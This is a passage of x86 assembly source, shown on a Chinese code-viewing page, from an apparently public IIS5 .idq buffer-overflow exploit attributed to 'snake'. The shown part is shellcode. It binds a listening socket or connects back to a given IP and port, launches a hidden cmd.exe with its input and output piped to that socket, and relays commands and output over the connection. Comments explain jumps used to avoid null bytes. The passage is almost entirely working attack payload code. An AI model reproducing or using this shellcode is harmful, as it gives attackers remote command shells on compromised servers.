📄 snake的iis5_idq命令行溢出程序源代码.htm
字号:
mov word ptr [ebx], ax; //SOCKADDR_IN.sin_family = AF_INET
pop eax;
;//现在寄存器状况..
;//edi --- 临时变量 sockaddr_in, (sin_family = AF_INET 被赋值)
;//edx --- 参数2 stConnectInfo 连结信息
;//eax --- 创建的管套 newsocket.
;//esi --- 参数1 SkOverflowFuncAddr 函数地址.
cmp cl,1 ;//是监听吗?
jne _IsConnectToIP; //no. 跳转.
push eax; // <-2@
;//取得端口value.
push eax; // <-1@
mov eax, [edx+stConnectInfo.dwListenPort];
call _convert_Sk_Long_To_Ansi_Word;
mov ecx, eax;
xchg ch,cl; //port = htons(port)
pop eax; // ->1@
lea ebx, [edi + SOCKADDR_IN.sin_port];
mov edx, FUNC_PARAM_2; //第2个参数.
mov word ptr [ebx], cx; //SOCKADDR_IN.sin_port = port.
xor eax, eax;
lea ebx, [edi + SOCKADDR_IN.sin_addr];
mov dword ptr [ebx], eax; //SOCKADDR_IN.sin_addr.S_un.S_addr = INADDR_ANY
pop eax; // ->2@
push eax; //<-3@
;//bind( msocket, (SOCKADDR *)&addrin, sizeof(addrin));
xor ecx, ecx;
mov cl, size sockaddr_in;
push ecx;
push edi;
push eax;
mov eax, [esi+SkOverflowFuncAddr.bind];
call eax;
;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.
jmp _temp_1;
run_actual3_1:
jmp run_actual3_2;
_temp_1:
pop eax; //->3@
push eax; //<-4@
;//listen( msocket, 1);
xor ecx, ecx;
inc ecx;
push ecx;
push eax;
mov eax, [esi+SkOverflowFuncAddr.listen];
call eax;
pop eax; //->4@
push eax; //<-5@
;//newsocket = accept( msocket, (SOCKADDR*)&addrin, &iLen);
xor ecx, ecx;
mov cl, size sockaddr_in;
lea edi, [ebp-0c0h];
mov [edi], ecx;
push edi; //iLen = sizeof(addrin);
lea edi, [ebp-0f0h];
push edi; //&SOCKADDR_IN 结构.
push eax;
mov eax,[esi+SkOverflowFuncAddr.accept];
call eax;
pop edx; //->5@ //用来listen的socket.由eax->edx
push eax; //<-6@ //得到新的连结管套..
;//关闭 用来 listen的socket.
;//closesocket( msocket);
push edx;
mov eax, [esi+SkOverflowFuncAddr.closesocket];
call eax;
pop eax; //->6@
cmp eax, -1;
je WSocket_QuitRightNow;
jmp Finish_Get_Connection_Socket;
_IsConnectToIP: ;//连接到一个ip:port
;//addrin.sin_family = AF_INET;
;//addrin.sin_addr.S_un.S_addr = 0x0100007f;
;//addrin.sin_port = 0x8b; //139.
;//connect( socket, (SOCKADDR*)&addrin, sizeof(addrin));
;//准备参数 SOCKADDR_IN
;//现在寄存器状况..
;//edi --- 临时变量 sockaddr_in, (sin_family = AF_INET 被赋值)
;//edx --- 参数2 stConnectInfo 连结信息
;//eax --- 创建的管套 newsocket.
;//esi --- 参数1 SkOverflowFuncAddr 函数地址.
;//取得端口value.
push eax; //<-1@
mov eax, [edx+stConnectInfo.dwConnectPort];
call _convert_Sk_Long_To_Ansi_Word;
mov ecx, eax;
xchg ch,cl; //port = htons(port)
lea ebx, [edi + SOCKADDR_IN.sin_port];
mov word ptr [ebx], cx; //SOCKADDR_IN.sin_port = port.
;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.
jmp _temp_1_1;
run_actual3_2:
jmp run_actual3;
_temp_1_1:
mov eax, [edx+stConnectInfo.dwIP1];
call _convert_Sk_Long_To_Ansi_Word;
mov ecx, eax;
shl ecx, 10h;
mov eax, [edx+stConnectInfo.dwIP2];
call _convert_Sk_Long_To_Ansi_Word;
mov cx, ax;
lea ebx, [edi + SOCKADDR_IN.sin_addr];
mov dword ptr [ebx], ecx; //SOCKADDR_IN.sin_addr.S_un.S_addr = stConnectInfo.dwIP1 + dwIP2
pop eax; //->1@
push eax; //<-2@
;//connect(msocket, addr, 0x10);
xor ecx, ecx;
mov cl, 10h;
push ecx; //sizeof(SOCKADDR_IN);
push edi; //SOCKADDR *
push eax; //msocket.
mov eax, [esi+SkOverflowFuncAddr.connect];
call eax; //connect.
mov ecx, eax;
pop eax; //->2@
jcxz Finish_Get_Connection_Socket; //connect success.
nop;
;//now, connect failure.
;//closesocket(eax)
push eax;
mov eax, [esi+SkOverflowFuncAddr.closesocket];
call eax;
xor eax, eax;
jmp WSocket_QuitRightNow;
Finish_Get_Connection_Socket:
push eax;
push eax;
pop edx; //edx = eax
;// setsockopt( newsocket, SOL_SOCKET, SO_RCVTIMEO, (LPCTSTR)&iLen, sizeof(iLen));
lea edi, [ebp-0f0h];
xor eax, eax;
mov al, 1;
mov [edi], eax;
shl eax, 2; //eax = 4
push eax;
push edi;
mov ax, SO_RCVTIMEO;
push eax;
mov ax, SOL_SOCKET;
push eax;
push edx;
mov eax, [esi+SkOverflowFuncAddr.setsockopt];
call eax;
pop eax;
WSocket_QuitRightNow:
;//返回结果.
pop ebx;
pop ecx;
pop edx;
pop edi;
pop esi;
mov esp, ebp;
pop ebp;
ret;
run_actual3:
jmp run_actual4_1;
;//在管套 pipe 上,运行进程 pStrCmd;
;//_Create_Process_To_Handle( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe, LPCTSTR *pStrCmd);
_Create_Process_To_Handle:
push ebp;
mov ebp, esp;
push edi;
push esi;
push edx;
push ecx;
push ebx;
push eax;
mov edi, FUNC_PARAM_2; //Shell_Cmd_Pipe *pCmdPipeData;
push edi;
pop edx; //edx = edi;
;//memset( &si, 0, sizeof(STARTUPINFO));
xor eax, eax;
lea edi, [edi +Shell_Cmd_Pipe.nstartupinfo];
push edi; //edi = &STARTUPINFO; ---
xor ecx, ecx;
mov cl, size STARTUPINFO;
rep stosb;
pop edi; // ---
;//si.cb = sizeof(STARTUPINFO);
lea esi, [edi + STARTUPINFO.cb];
mov cl, size STARTUPINFO;
mov [esi], ecx;
;//si.wShowWindow = SW_HIDE = 0; //need to do nothing.
;//si.dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
lea esi, [edi + STARTUPINFO.dwFlags];
mov cx, 101h;
mov [esi], ecx;
;//si.hStdInput = ShellStdinPipe;
push edi;
lea edi, [edi + STARTUPINFO.hStdInput];
lea esi, [edx + Shell_Cmd_Pipe.ShellStdinPipe];
mov eax, [esi];
mov [edi], eax;
pop edi;
;//si.hStdOutput = ShellStdoutPipe;
push edi;
lea edi, [edi+STARTUPINFO.hStdOutput];
lea esi, [edx+Shell_Cmd_Pipe.ShellStdoutPipe];
mov eax, [esi];
mov [edi], eax;
pop edi;
;// DuplicateHandle( GetCurrentProcess(), ShellStdoutPipe, GetCurrentProcess(),
;// &(si.hStdError),DUPLICATE_SAME_ACCESS, TRUE, 0);
mov esi, FUNC_PARAM_1;
mov eax, [esi+SkOverflowFuncAddr.GetCurrentProcess];
call eax;
xor ecx, ecx;
push ecx; //0
inc ecx;
push ecx; //TRUE
inc ecx;
push ecx; //DUPLICATE_SAME_ACCESS
lea edx, [edi+STARTUPINFO.hStdError];
push edx; //&(si.hStdError)
push eax; //GetCurrentProcess();
push esi;
mov esi, FUNC_PARAM_2;
lea esi, [esi+Shell_Cmd_Pipe.ShellStdoutPipe];
mov ebx, [esi];
pop esi;
;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.
jmp _temp_2;
run_actual4_1:
jmp run_actual4;
_temp_2:
push ebx; //ShellStdoutPipe
push eax; //GetCurrentProcess();
mov eax, [esi+SkOverflowFuncAddr.DuplicateHandle];
call eax;
;// CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, 0,
;// NULL, NULL, &si, &ProcessInformation )
xor eax, eax;
mov edi, FUNC_PARAM_2;
lea edx, [edi+Shell_Cmd_Pipe.ProcessInformation];
push edx; ;//&ProcessInformation
lea edx, [edi+Shell_Cmd_Pipe.nstartupinfo];
push edx; ;//&si
push eax; ;//NULL;
push eax; ;//NULL;
push eax; ;//0;
inc eax;
push eax; ;//TRUE;
dec eax;
push eax; ;//NULL;
push eax; ;//NULL;
mov edx, FUNC_PARAM_3;
push edx; ;//LPCTSTR lpszCommand.
push eax; ;//NULL;
mov eax, [esi+SkOverflowFuncAddr.CreateProcessA];
call eax;
;//CloseHandle( ShellStdinPipe);
mov eax, [edi+Shell_Cmd_Pipe.ShellStdinPipe];
push eax;
mov eax, [esi+SkOverflowFuncAddr.CloseHandle];
call eax;
;//CloseHandle( ShellStdoutPipe);
mov eax, [edi+Shell_Cmd_Pipe.ShellStdoutPipe];
push eax;
mov eax, [esi+SkOverflowFuncAddr.CloseHandle];
call eax;
pop eax;
pop ebx;
pop ecx;
pop edx;
pop esi;
pop edi;
mov esp, ebp;
pop ebp;
ret;
;//memset( &si, 0, sizeof(STARTUPINFO));
run_actual4:
jmp run_actual5;
;//关闭不再用的管套
;//_Close_All_Communication_Pipe(SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
_Close_All_Communication_Pipe:
push ebp;
mov ebp, esp;
push esi;
push edi;
push edx;
push ecx;
push ebx;
push eax;
mov esi, FUNC_PARAM_1;
mov edi, FUNC_PARAM_2;
;//closesocket(msocket);
mov eax, [edi+Shell_Cmd_Pipe.msocket];
push eax;
mov eax, [esi+SkOverflowFuncAddr.closesocket];
call eax;
;//closehandle(handle)..
mov eax, [edi+Shell_Cmd_Pipe.hReadPipe];
push eax;
mov eax, [esi+SkOverflowFuncAddr.CloseHandle];
call eax;
;//closehandle(handle)..
mov eax, [edi+Shell_Cmd_Pipe.hWritePipe];
push eax;
mov eax, [esi+SkOverflowFuncAddr.CloseHandle];
call eax;
pop eax;
pop ebx;
pop ecx;
pop edx;
pop edi;
pop esi;
mov esp, ebp;
pop ebp;
ret;
run_actual5:
jmp run_actual6_1;
;//接受管套的数据,写进pipe,读pipe,发送到socket.
;//_Recv_Write_Socket_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
_Recv_Write_Socket_Pipe:
push ebp;
mov ebp, esp;
xor eax, eax;
mov ax, 2f0h;
sub esp, eax; // 496bytes, use for char szTemp[240];
push esi;
push edi;
push edx;
push ecx;
push ebx;
mov esi, FUNC_PARAM_1; //SkOverflowFuncAddr *pAddr;
mov edi, FUNC_PARAM_2; //Shell_Cmd_Pipe *pCmdPipeData;
;//dwBreak = 1
lea edx, [ebp - size Recv_Write_Socket_Pipe_Data + Recv_Write_Socket_Pipe_Data.dwBreak];
xor eax, eax;
inc eax;
mov [edx], eax;
;//while(!bBreak)
_While_Read_Data_Loop:
;//监测 dwBreak == 0?
lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwBreak];
mov eax, [edx];
test eax, eax;
jz _Quit_While_Read_Data_Loop_1;
;//iLen = recv( newsocket, szTemp, sizeof(szTemp)-1, 0);
xor eax, eax;
push eax;
mov al, SIZE_OF_TEMP_BUFFER;
push eax;
lea eax, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];
push eax;
lea ebx, [edi+Shell_Cmd_Pipe.msocket];
mov eax, [ebx];
push eax;
mov eax, [esi+SkOverflowFuncAddr.recv];
call eax;
cmp eax, -1;
jne _NextStep_Receive_Test;
push eax;
pop edx;
mov eax, [esi+SkOverflowFuncAddr.GetLastError];
call eax;
cmp ax, 10060; //timeout?
je _Read_StdoutPipe;
_Quit_While_Read_Data_Loop_1:
jmp _Quit_While_Read_Data_Loop; //error.
_NextStep_Receive_Test:
test eax, eax; //eax == 0?
je _Quit_While_Read_Data_Loop; //break;
jng _Read_StdoutPipe;
;//Receive_Ok_Occure:
;//if( iLen > 0)
;//WriteFile( hWritePipe, szTemp, iLen, &dwTemp, NULL)
xor edx, edx;
push edx; //NULL
lea ebx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];
push ebx; //&dwTemp
push eax; //iLen
lea ebx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];
push ebx; //szTemp;
mov eax, [edi+Shell_Cmd_Pipe.hWritePipe];
push eax;
mov eax, [esi+SkOverflowFuncAddr.WriteFile];
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -